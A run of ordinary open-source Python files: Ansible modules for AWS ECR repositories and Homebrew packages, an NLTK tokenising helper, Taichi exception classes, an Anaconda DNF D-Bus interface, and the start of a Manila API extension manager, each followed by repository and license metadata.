- name: destroy-ecr-repo
ecs_ecr: name=old/busted state=absent
- name: Cross account ecr-repo
ecs_ecr: registry_id=999999999999 name=cross/account
- name: set-policy as object
ecs_ecr:
name: needs-policy-object
policy:
Version: '2008-10-17'
Statement:
- Sid: read-only
Effect: Allow
Principal:
AWS: '{{ read_only_arn }}'
Action:
- ecr:GetDownloadUrlForLayer
- ecr:BatchGetImage
- ecr:BatchCheckLayerAvailability
- name: set-policy as string
ecs_ecr:
name: needs-policy-string
policy: "{{ lookup('template', 'policy.json.j2') }}"
- name: delete-policy
ecs_ecr:
name: needs-no-policy
delete_policy: yes
'''
RETURN = '''
state:
type: string
description: The asserted state of the repository (present, absent)
returned: always
created:
type: boolean
description: If true, the repository was created
returned: always
name:
type: string
description: The name of the repository
returned: "when state == 'absent'"
repository:
type: dict
description: The created or updated repository
returned: "when state == 'present'"
sample:
createdAt: '2017-01-17T08:41:32-06:00'
registryId: '999999999999'
repositoryArn: arn:aws:ecr:us-east-1:999999999999:repository/ecr-test-1484664090
repositoryName: ecr-test-1484664090
repositoryUri: 999999999999.dkr.ecr.us-east-1.amazonaws.com/ecr-test-1484664090
'''
import json
import traceback
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def build_kwargs(registry_id):
"""
Builds a kwargs dict which may contain the optional registryId.
:param registry_id: Optional string containing the registryId.
:return: kwargs dict with registryId, if given
"""
if not registry_id:
return dict()
else:
return dict(registryId=registry_id)
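# For example, build_kwargs(None) returns {} so that **build_kwargs(...)
# adds nothing to the call, while build_kwargs('999999999999') returns
# {'registryId': '999999999999'}.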
class EcsEcr:
def __init__(self, module):
region, ec2_url, aws_connect_kwargs = \
get_aws_connection_info(module, boto3=True)
self.ecr = boto3_conn(module, conn_type='client',
resource='ecr', region=region,
endpoint=ec2_url, **aws_connect_kwargs)
self.check_mode = module.check_mode
self.changed = False
self.skipped = False
def get_repository(self, registry_id, name):
try:
res = self.ecr.describe_repositories(
repositoryNames=[name], **build_kwargs(registry_id))
repos = res.get('repositories')
return repos and repos[0]
except ClientError as err:
code = err.response['Error'].get('Code', 'Unknown')
if code == 'RepositoryNotFoundException':
return None
raise
def get_repository_policy(self, registry_id, name):
try:
res = self.ecr.get_repository_policy(
repositoryName=name, **build_kwargs(registry_id))
text = res.get('policyText')
return text and json.loads(text)
except ClientError as err:
code = err.response['Error'].get('Code', 'Unknown')
if code == 'RepositoryPolicyNotFoundException':
return None
raise
def create_repository(self, registry_id, name):
if not self.check_mode:
repo = self.ecr.create_repository(
repositoryName=name, **build_kwargs(registry_id)).get(
'repository')
self.changed = True
return repo
else:
self.skipped = True
return dict(repositoryName=name)
def set_repository_policy(self, registry_id, name, policy_text, force):
if not self.check_mode:
policy = self.ecr.set_repository_policy(
repositoryName=name,
policyText=policy_text,
force=force,
**build_kwargs(registry_id))
self.changed = True
return policy
else:
self.skipped = True
if self.get_repository(registry_id, name) is None:
printable = name
if registry_id:
printable = '{}:{}'.format(registry_id, name)
raise Exception(
'could not find repository {}'.format(printable))
return
def delete_repository(self, registry_id, name):
if not self.check_mode:
repo = self.ecr.delete_repository(
repositoryName=name, **build_kwargs(registry_id))
self.changed = True
return repo
else:
repo = self.get_repository(registry_id, name)
if repo:
self.skipped = True
return repo
return None
def delete_repository_policy(self, registry_id, name):
if not self.check_mode:
policy = self.ecr.delete_repository_policy(
repositoryName=name, **build_kwargs(registry_id))
self.changed = True
return policy
else:
policy = self.get_repository_policy(registry_id, name)
if policy:
self.skipped = True
return policy
return None
def run(ecr, params, verbosity):
# type: (EcsEcr, dict, int) -> Tuple[bool, dict]
result = {}
try:
name = params['name']
state = params['state']
policy_text = params['policy']
delete_policy = params['delete_policy']
registry_id = params['registry_id']
force_set_policy = params['force_set_policy']
# If a policy was given, parse it
policy = policy_text and json.loads(policy_text)
result['state'] = state
result['created'] = False
repo = ecr.get_repository(registry_id, name)
if state == 'present':
result['created'] = False
if not repo:
repo = ecr.create_repository(registry_id, name)
result['changed'] = True
result['created'] = True
result['repository'] = repo
if delete_policy:
original_policy = ecr.get_repository_policy(registry_id, name)
if verbosity >= 2:
result['policy'] = None
if verbosity >= 3:
result['original_policy'] = original_policy
if original_policy:
ecr.delete_repository_policy(registry_id, name)
result['changed'] = True
elif policy_text is not None:
try:
policy = sort_json_policy_dict(policy)
if verbosity >= 2:
result['policy'] = policy
original_policy = ecr.get_repository_policy(
registry_id, name)
if original_policy:
original_policy = sort_json_policy_dict(original_policy)
if verbosity >= 3:
result['original_policy'] = original_policy
if original_policy != policy:
ecr.set_repository_policy(
registry_id, name, policy_text, force_set_policy)
result['changed'] = True
            except Exception:
# Some failure w/ the policy. It's helpful to know what the
# policy is.
result['policy'] = policy_text
raise
elif state == 'absent':
result['name'] = name
if repo:
ecr.delete_repository(registry_id, name)
result['changed'] = True
except Exception as err:
msg = str(err)
if isinstance(err, ClientError):
msg = boto_exception(err)
result['msg'] = msg
result['exception'] = traceback.format_exc()
return False, result
if ecr.skipped:
result['skipped'] = True
if ecr.changed:
result['changed'] = True
return True, result
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
registry_id=dict(required=False),
state=dict(required=False, choices=['present', 'absent'],
default='present'),
force_set_policy=dict(required=False, type='bool', default=False),
policy=dict(required=False, type='json'),
delete_policy=dict(required=False, type='bool')))
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['policy', 'delete_policy']])
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
ecr = EcsEcr(module)
passed, result = run(ecr, module.params, module._verbosity)
if passed:
module.exit_json(**result)
else:
module.fail_json(**result)
if __name__ == '__main__':
main()
|
e-gob/plataforma-kioscos-autoatencion
|
scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_ecr.py
|
Python
|
bsd-3-clause
| 11,534
|
from nltk.corpus import stopwords
import nltk, string
__author__ = 'Jasneet Sabharwal'
def pre_process(phrase):
#phrase = phrase.lower()
#phrase = phrase.translate(None, string.punctuation)
tokens = nltk.word_tokenize(phrase)
#clean_tokens = [token for token in tokens if not token in stopwords.words(
# 'english')]
return tokens
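# Example (assumes nltk's 'punkt' tokenizer data has been downloaded):
#     pre_process('Hello, world!')  # -> ['Hello', ',', 'world', '!']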
|
KonceptGeek/KaggleSentimentAnalysis
|
src/preprocessing/preProcess.py
|
Python
|
gpl-2.0
| 359
|
from taichi._lib import core
class TaichiCompilationError(Exception):
"""Base class for all compilation exceptions.
"""
pass
class TaichiSyntaxError(TaichiCompilationError, SyntaxError):
"""Thrown when a syntax error is found during compilation.
"""
pass
class TaichiNameError(TaichiCompilationError, NameError):
"""Thrown when an undefine name is found during compilation.
"""
pass
class TaichiTypeError(TaichiCompilationError, TypeError):
"""Thrown when a type mismatch is found during compilation.
"""
pass
class TaichiRuntimeError(RuntimeError):
"""Thrown when the compiled program cannot be executed due to unspecified reasons.
"""
pass
class TaichiRuntimeTypeError(TaichiRuntimeError, TypeError):
def __init__(self, pos, needed, provided):
message = f'Argument {pos} (type={provided}) cannot be converted into required type {needed}'
super().__init__(message)
def handle_exception_from_cpp(exc):
if isinstance(exc, core.TaichiTypeError):
return TaichiTypeError(str(exc))
if isinstance(exc, core.TaichiSyntaxError):
return TaichiSyntaxError(str(exc))
return exc
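# Illustrative use (not part of this module): re-raising a C++-side error as
# its Python-level counterpart, where `call_into_core` stands for any binding
# that may raise the core exception types.
#
#     try:
#         call_into_core()
#     except Exception as e:
#         raise handle_exception_from_cpp(e)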
__all__ = [
'TaichiSyntaxError', 'TaichiTypeError', 'TaichiCompilationError',
'TaichiNameError', 'TaichiRuntimeError', 'TaichiRuntimeTypeError'
]
|
yuanming-hu/taichi
|
python/taichi/lang/exception.py
|
Python
|
mit
| 1,345
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Andrew Dunham <andrew@du.nham.ca>
# (c) 2013, Daniel Jaouen <dcj24@cornell.edu>
#
# Based on macports (Jimmy Tang <jcftang@gmail.com>)
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: homebrew
author: Andrew Dunham and Daniel Jaouen
short_description: Package manager for Homebrew
description:
- Manages Homebrew packages
version_added: "1.1"
options:
name:
description:
- name of package to install/remove
required: true
state:
description:
- state of the package
choices: [ 'head', 'latest', 'present', 'absent', 'linked', 'unlinked' ]
required: false
default: present
update_homebrew:
description:
- update homebrew itself first
required: false
default: "no"
choices: [ "yes", "no" ]
upgrade_all:
description:
- upgrade all homebrew packages
required: false
default: no
choices: [ "yes", "no" ]
install_options:
description:
- options flags to install a package
required: false
default: null
version_added: "1.4"
notes: []
'''
EXAMPLES = '''
- homebrew: name=foo state=present
- homebrew: name=foo state=present update_homebrew=yes
- homebrew: name=foo state=latest update_homebrew=yes
- homebrew: update_homebrew=yes upgrade_all=yes
- homebrew: name=foo state=head
- homebrew: name=foo state=linked
- homebrew: name=foo state=absent
- homebrew: name=foo,bar state=absent
- homebrew: name=foo state=present install_options=with-baz,enable-debug
'''
import os.path
import re
# exceptions -------------------------------------------------------------- {{{
class HomebrewException(Exception):
pass
# /exceptions ------------------------------------------------------------- }}}
# utils ------------------------------------------------------------------- {{{
def _create_regex_group(s):
lines = (line.strip() for line in s.split('\n') if line.strip())
chars = filter(None, (line.split('#')[0].strip() for line in lines))
group = r'[^' + r''.join(chars) + r']'
return re.compile(group)
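# For example, applied to VALID_PACKAGE_CHARS (defined below) this yields
# roughly r'[^\w./\+-]', i.e. a regex matching any character that is *not*
# allowed in a package name (it would match the space in 'foo bar').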
# /utils ------------------------------------------------------------------ }}}
class Homebrew(object):
'''A class to manage Homebrew packages.'''
# class regexes ------------------------------------------------ {{{
VALID_PATH_CHARS = r'''
\w # alphanumeric characters (i.e., [a-zA-Z0-9_])
\s # spaces
: # colons
{sep} # the OS-specific path separator
. # dots
- # dashes
'''.format(sep=os.path.sep)
VALID_BREW_PATH_CHARS = r'''
\w # alphanumeric characters (i.e., [a-zA-Z0-9_])
\s # spaces
{sep} # the OS-specific path separator
. # dots
- # dashes
'''.format(sep=os.path.sep)
VALID_PACKAGE_CHARS = r'''
\w # alphanumeric characters (i.e., [a-zA-Z0-9_])
. # dots
/ # slash (for taps)
\+ # plusses
- # dashes
'''
INVALID_PATH_REGEX = _create_regex_group(VALID_PATH_CHARS)
INVALID_BREW_PATH_REGEX = _create_regex_group(VALID_BREW_PATH_CHARS)
INVALID_PACKAGE_REGEX = _create_regex_group(VALID_PACKAGE_CHARS)
# /class regexes ----------------------------------------------- }}}
# class validations -------------------------------------------- {{{
@classmethod
def valid_path(cls, path):
'''
`path` must be one of:
- list of paths
- a string containing only:
- alphanumeric characters
- dashes
- dots
- spaces
- colons
- os.path.sep
'''
if isinstance(path, basestring):
return not cls.INVALID_PATH_REGEX.search(path)
try:
iter(path)
except TypeError:
return False
else:
paths = path
return all(cls.valid_brew_path(path_) for path_ in paths)
@classmethod
def valid_brew_path(cls, brew_path):
'''
`brew_path` must be one of:
- None
- a string containing only:
- alphanumeric characters
- dashes
- dots
- spaces
- os.path.sep
'''
if brew_path is None:
return True
return (
isinstance(brew_path, basestring)
and not cls.INVALID_BREW_PATH_REGEX.search(brew_path)
)
@classmethod
def valid_package(cls, package):
'''A valid package is either None or alphanumeric.'''
if package is None:
return True
return (
isinstance(package, basestring)
and not cls.INVALID_PACKAGE_REGEX.search(package)
)
@classmethod
def valid_state(cls, state):
'''
A valid state is one of:
- None
- installed
- upgraded
- head
- linked
- unlinked
- absent
'''
if state is None:
return True
else:
return (
isinstance(state, basestring)
and state.lower() in (
'installed',
'upgraded',
'head',
'linked',
'unlinked',
'absent',
)
)
@classmethod
def valid_module(cls, module):
'''A valid module is an instance of AnsibleModule.'''
return isinstance(module, AnsibleModule)
# /class validations ------------------------------------------- }}}
# class properties --------------------------------------------- {{{
@property
def module(self):
return self._module
@module.setter
def module(self, module):
if not self.valid_module(module):
self._module = None
self.failed = True
self.message = 'Invalid module: {0}.'.format(module)
raise HomebrewException(self.message)
else:
self._module = module
return module
@property
def path(self):
return self._path
@path.setter
def path(self, path):
if not self.valid_path(path):
self._path = []
self.failed = True
self.message = 'Invalid path: {0}.'.format(path)
raise HomebrewException(self.message)
else:
if isinstance(path, basestring):
self._path = path.split(':')
else:
self._path = path
return path
@property
def brew_path(self):
return self._brew_path
@brew_path.setter
def brew_path(self, brew_path):
if not self.valid_brew_path(brew_path):
self._brew_path = None
self.failed = True
self.message = 'Invalid brew_path: {0}.'.format(brew_path)
raise HomebrewException(self.message)
else:
self._brew_path = brew_path
return brew_path
@property
def params(self):
return self._params
@params.setter
def params(self, params):
self._params = self.module.params
return self._params
@property
def current_package(self):
return self._current_package
@current_package.setter
def current_package(self, package):
if not self.valid_package(package):
self._current_package = None
self.failed = True
self.message = 'Invalid package: {0}.'.format(package)
raise HomebrewException(self.message)
else:
self._current_package = package
return package
# /class properties -------------------------------------------- }}}
def __init__(self, module, path=None, packages=None, state=None,
update_homebrew=False, upgrade_all=False,
install_options=None):
if not install_options:
install_options = list()
self._setup_status_vars()
self._setup_instance_vars(module=module, path=path, packages=packages,
state=state, update_homebrew=update_homebrew,
upgrade_all=upgrade_all,
install_options=install_options, )
self._prep()
# prep --------------------------------------------------------- {{{
def _setup_status_vars(self):
self.failed = False
self.changed = False
self.changed_count = 0
self.unchanged_count = 0
self.message = ''
def _setup_instance_vars(self, **kwargs):
for key, val in kwargs.iteritems():
setattr(self, key, val)
def _prep(self):
self._prep_path()
self._prep_brew_path()
def _prep_path(self):
if not self.path:
self.path = ['/usr/local/bin']
def _prep_brew_path(self):
if not self.module:
self.brew_path = None
self.failed = True
self.message = 'AnsibleModule not set.'
raise HomebrewException(self.message)
self.brew_path = self.module.get_bin_path(
'brew',
required=True,
opt_dirs=self.path,
)
if not self.brew_path:
self.brew_path = None
self.failed = True
self.message = 'Unable to locate homebrew executable.'
raise HomebrewException('Unable to locate homebrew executable.')
return self.brew_path
def _status(self):
return (self.failed, self.changed, self.message)
# /prep -------------------------------------------------------- }}}
def run(self):
try:
self._run()
except HomebrewException:
pass
if not self.failed and (self.changed_count + self.unchanged_count > 1):
self.message = "Changed: %d, Unchanged: %d" % (
self.changed_count,
self.unchanged_count,
)
(failed, changed, message) = self._status()
return (failed, changed, message)
# checks ------------------------------------------------------- {{{
def _current_package_is_installed(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
cmd = [
"{brew_path}".format(brew_path=self.brew_path),
"info",
self.current_package,
]
rc, out, err = self.module.run_command(cmd)
for line in out.split('\n'):
if (
re.search(r'Built from source', line)
or re.search(r'Poured from bottle', line)
):
return True
return False
def _outdated_packages(self):
rc, out, err = self.module.run_command([
self.brew_path,
'outdated',
])
return [line.split(' ')[0].strip() for line in out.split('\n') if line]
def _current_package_is_outdated(self):
if not self.valid_package(self.current_package):
return False
return self.current_package in self._outdated_packages()
def _current_package_is_installed_from_head(self):
if not Homebrew.valid_package(self.current_package):
return False
elif not self._current_package_is_installed():
return False
rc, out, err = self.module.run_command([
self.brew_path,
'info',
self.current_package,
])
try:
version_info = [line for line in out.split('\n') if line][0]
except IndexError:
return False
return version_info.split(' ')[-1] == 'HEAD'
# /checks ------------------------------------------------------ }}}
# commands ----------------------------------------------------- {{{
def _run(self):
if self.update_homebrew:
self._update_homebrew()
if self.upgrade_all:
self._upgrade_all()
if self.packages:
if self.state == 'installed':
return self._install_packages()
elif self.state == 'upgraded':
return self._upgrade_packages()
elif self.state == 'head':
return self._install_packages()
elif self.state == 'linked':
return self._link_packages()
elif self.state == 'unlinked':
return self._unlink_packages()
elif self.state == 'absent':
return self._uninstall_packages()
# updated -------------------------------- {{{
def _update_homebrew(self):
rc, out, err = self.module.run_command([
self.brew_path,
'update',
])
if rc == 0:
if out and isinstance(out, basestring):
already_updated = any(
re.search(r'Already up-to-date.', s.strip(), re.IGNORECASE)
for s in out.split('\n')
if s
)
if not already_updated:
self.changed = True
self.message = 'Homebrew updated successfully.'
else:
self.message = 'Homebrew already up-to-date.'
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
# /updated ------------------------------- }}}
# _upgrade_all --------------------------- {{{
def _upgrade_all(self):
rc, out, err = self.module.run_command([
self.brew_path,
'upgrade',
])
if rc == 0:
if not out:
self.message = 'Homebrew packages already upgraded.'
else:
self.changed = True
self.message = 'Homebrew upgraded.'
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
# /_upgrade_all -------------------------- }}}
# installed ------------------------------ {{{
def _install_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if self._current_package_is_installed():
self.unchanged_count += 1
self.message = 'Package already installed: {0}'.format(
self.current_package,
)
return True
if self.module.check_mode:
self.changed = True
self.message = 'Package would be installed: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
if self.state == 'head':
head = '--HEAD'
else:
head = None
opts = (
[self.brew_path, 'install']
+ self.install_options
+ [self.current_package, head]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if self._current_package_is_installed():
self.changed_count += 1
self.changed = True
self.message = 'Package installed: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _install_packages(self):
for package in self.packages:
self.current_package = package
self._install_current_package()
return True
# /installed ----------------------------- }}}
# upgraded ------------------------------- {{{
def _upgrade_current_package(self):
command = 'upgrade'
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
command = 'install'
if self._current_package_is_installed() and not self._current_package_is_outdated():
self.message = 'Package is already upgraded: {0}'.format(
self.current_package,
)
self.unchanged_count += 1
return True
if self.module.check_mode:
self.changed = True
self.message = 'Package would be upgraded: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, command]
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if self._current_package_is_installed() and not self._current_package_is_outdated():
self.changed_count += 1
self.changed = True
self.message = 'Package upgraded: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _upgrade_all_packages(self):
opts = (
[self.brew_path, 'upgrade']
+ self.install_options
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if rc == 0:
self.changed = True
self.message = 'All packages upgraded.'
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _upgrade_packages(self):
if not self.packages:
self._upgrade_all_packages()
else:
for package in self.packages:
self.current_package = package
self._upgrade_current_package()
return True
# /upgraded ------------------------------ }}}
# uninstalled ---------------------------- {{{
def _uninstall_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
self.unchanged_count += 1
self.message = 'Package already uninstalled: {0}'.format(
self.current_package,
)
return True
if self.module.check_mode:
self.changed = True
self.message = 'Package would be uninstalled: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, 'uninstall']
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if not self._current_package_is_installed():
self.changed_count += 1
self.changed = True
self.message = 'Package uninstalled: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _uninstall_packages(self):
for package in self.packages:
self.current_package = package
self._uninstall_current_package()
return True
# /uninstalled ----------------------------- }}}
# linked --------------------------------- {{{
def _link_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
self.failed = True
self.message = 'Package not installed: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if self.module.check_mode:
self.changed = True
self.message = 'Package would be linked: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, 'link']
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if rc == 0:
self.changed_count += 1
self.changed = True
self.message = 'Package linked: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = 'Package could not be linked: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
def _link_packages(self):
for package in self.packages:
self.current_package = package
self._link_current_package()
return True
# /linked -------------------------------- }}}
# unlinked ------------------------------- {{{
def _unlink_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
self.failed = True
self.message = 'Package not installed: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if self.module.check_mode:
self.changed = True
self.message = 'Package would be unlinked: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, 'unlink']
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if rc == 0:
self.changed_count += 1
self.changed = True
self.message = 'Package unlinked: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = 'Package could not be unlinked: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
def _unlink_packages(self):
for package in self.packages:
self.current_package = package
self._unlink_current_package()
return True
# /unlinked ------------------------------ }}}
# /commands ---------------------------------------------------- }}}
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(aliases=["pkg"], required=False),
path=dict(required=False),
state=dict(
default="present",
choices=[
"present", "installed",
"latest", "upgraded", "head",
"linked", "unlinked",
"absent", "removed", "uninstalled",
],
),
update_homebrew=dict(
default="no",
aliases=["update-brew"],
type='bool',
),
upgrade_all=dict(
default="no",
aliases=["upgrade"],
type='bool',
),
install_options=dict(
default=None,
aliases=['options'],
type='list',
)
),
supports_check_mode=True,
)
p = module.params
if p['name']:
packages = p['name'].split(',')
else:
packages = None
path = p['path']
if path:
path = path.split(':')
else:
path = ['/usr/local/bin']
state = p['state']
if state in ('present', 'installed'):
state = 'installed'
if state in ('head', ):
state = 'head'
if state in ('latest', 'upgraded'):
state = 'upgraded'
if state == 'linked':
state = 'linked'
if state == 'unlinked':
state = 'unlinked'
if state in ('absent', 'removed', 'uninstalled'):
state = 'absent'
update_homebrew = p['update_homebrew']
upgrade_all = p['upgrade_all']
p['install_options'] = p['install_options'] or []
install_options = ['--{0}'.format(install_option)
for install_option in p['install_options']]
brew = Homebrew(module=module, path=path, packages=packages,
state=state, update_homebrew=update_homebrew,
upgrade_all=upgrade_all, install_options=install_options)
(failed, changed, message) = brew.run()
if failed:
module.fail_json(msg=message)
else:
module.exit_json(changed=changed, msg=message)
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
|
mattbernst/polyhartree
|
support/ansible/modules/extras/packaging/os/homebrew.py
|
Python
|
gpl-3.0
| 26,616
|
#
# DBus interface for DNF payload.
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from dasbus.server.interface import dbus_interface
from dasbus.server.property import emits_properties_changed
from dasbus.typing import * # pylint: disable=wildcard-import
from pyanaconda.modules.common.constants.interfaces import PAYLOAD_DNF
from pyanaconda.modules.common.structures.payload import RepoConfigurationData
from pyanaconda.modules.common.structures.packages import PackagesConfigurationData, \
PackagesSelectionData
from pyanaconda.modules.payloads.payload.payload_base_interface import PayloadBaseInterface
__all__ = ["DNFInterface"]
@dbus_interface(PAYLOAD_DNF.interface_name)
class DNFInterface(PayloadBaseInterface):
"""DBus interface for DNF payload module."""
def connect_signals(self):
"""Connect the signals."""
super().connect_signals()
self.watch_property(
"PackagesConfiguration",
self.implementation.packages_configuration_changed
)
self.watch_property(
"PackagesSelection",
self.implementation.packages_selection_changed
)
@property
def PackagesConfiguration(self) -> Structure:
"""The packages configuration.
:return: a structure of the type PackagesConfigurationData
"""
return PackagesConfigurationData.to_structure(
self.implementation.packages_configuration
)
@emits_properties_changed
def SetPackagesConfiguration(self, data: Structure):
"""Set the packages configuration.
:param data: a structure of the type PackagesConfigurationData
"""
self.implementation.set_packages_configuration(
PackagesConfigurationData.from_structure(data)
)
@property
def PackagesSelection(self) -> Structure:
"""The packages selection.
:return: a structure of the type PackagesSelectionData
"""
return PackagesSelectionData.to_structure(
self.implementation.packages_selection
)
@emits_properties_changed
def SetPackagesSelection(self, data: Structure):
"""Set the packages selection.
        :param data: a structure of the type PackagesSelectionData
"""
self.implementation.set_packages_selection(
PackagesSelectionData.from_structure(data)
)
@property
def PackagesKickstarted(self) -> Bool:
"""Are the packages set from a kickstart?
FIXME: This is a temporary property.
:return: True or False
"""
return self.implementation.packages_kickstarted
def GetRepoConfigurations(self) -> List[Structure]:
"""Get RepoConfigurationData structures for all attached sources.
FIXME: This is a temporary solution. Will be removed after DNF payload logic is moved.
"""
return RepoConfigurationData.to_structure_list(
self.implementation.get_repo_configurations()
)
|
jkonecny12/anaconda
|
pyanaconda/modules/payloads/payload/dnf/dnf_interface.py
|
Python
|
gpl-2.0
| 3,918
|
# Copyright 2011 OpenStack LLC.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
from oslo_log import log
from oslo_utils import importutils
import six
import webob.dec
import webob.exc
import manila.api.openstack
from manila.api.openstack import wsgi
from manila import exception
from manila.i18n import _LE, _LI, _LW
import manila.policy
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class ExtensionDescriptor(object):
"""Base class that defines the contract for extensions.
Note that you don't have to derive from this class to have a valid
extension; it is purely a convenience.
"""
# The name of the extension, e.g., 'Fox In Socks'
name = None
# The alias for the extension, e.g., 'FOXNSOX'
alias = None
# Description comes from the docstring for the class
# The timestamp when the extension was last updated, e.g.,
# '2011-01-22T13:25:27-06:00'
updated = None
def __init__(self, ext_mgr):
"""Register extension with the extension manager."""
ext_mgr.register(self)
self.ext_mgr = ext_mgr
def get_resources(self):
"""List of extensions.ResourceExtension extension objects.
Resources define new nouns, and are accessible through URLs.
"""
resources = []
return resources
def get_controller_extensions(self):
"""List of extensions.ControllerExtension extension objects.
Controller extensions are used to extend existing controllers.
"""
controller_exts = []
return controller_exts
class ExtensionsResource(wsgi.Resource):
def __init__(self, extension_manager):
self.extension_manager = extension_manager
super(ExtensionsResource, self).__init__(None)
def _translate(self, ext):
ext_data = {}
ext_data['name'] = ext.name
ext_data['alias'] = ext.alias
ext_data['description'] = ext.__doc__
ext_data['updated'] = ext.updated
ext_data['links'] = [] # TODO(dprince): implement extension links
return ext_data
def index(self, req):
extensions = []
for _alias, ext in self.extension_manager.extensions.items():
extensions.append(self._translate(ext))
return dict(extensions=extensions)
def show(self, req, id):
try:
# NOTE(dprince): the extensions alias is used as the 'id' for show
ext = self.extension_manager.extensions[id]
except KeyError:
raise webob.exc.HTTPNotFound()
return dict(extension=self._translate(ext))
def delete(self, req, id):
raise webob.exc.HTTPNotFound()
def create(self, req):
raise webob.exc.HTTPNotFound()
class ExtensionManager(object):
"""Load extensions from the configured extension path.
See manila/tests/api/extensions/foxinsocks/extension.py for an
example extension implementation.
"""
def __init__(self):
LOG.info(_LI('Initializing extension manager.'))
self.cls_list = CONF.osapi_share_extension
self.extensions = {}
self._load_extensions()
def is_loaded(self, alias):
return alias in self.extensions
def register(self, ext):
# Do nothing if the extension doesn't check out
if not self._check_extension(ext):
return
alias = ext.alias
LOG.info(_LI('Loaded extension: %s'), alias)
if alias in self.extensions:
raise exception.Error("Found duplicate extension: %s" % alias)
self.extensions[alias] = ext
def get_resources(self):
"""Returns a list of ResourceExtension objects."""
resources = []
resources.append(ResourceExtension('extensions',
ExtensionsResource(self)))
for ext in self.extensions.values():
try:
resources.extend(ext.get_resources())
except AttributeError:
                # NOTE(dprince): Extensions aren't required to have resource
# extensions
pass
return resources
def get_controller_extensions(self):
"""Returns a list of ControllerExtension objects."""
controller_exts = []
for ext in self.extensions.values():
try:
get_ext_method = ext.get_controller_extensions
except AttributeError:
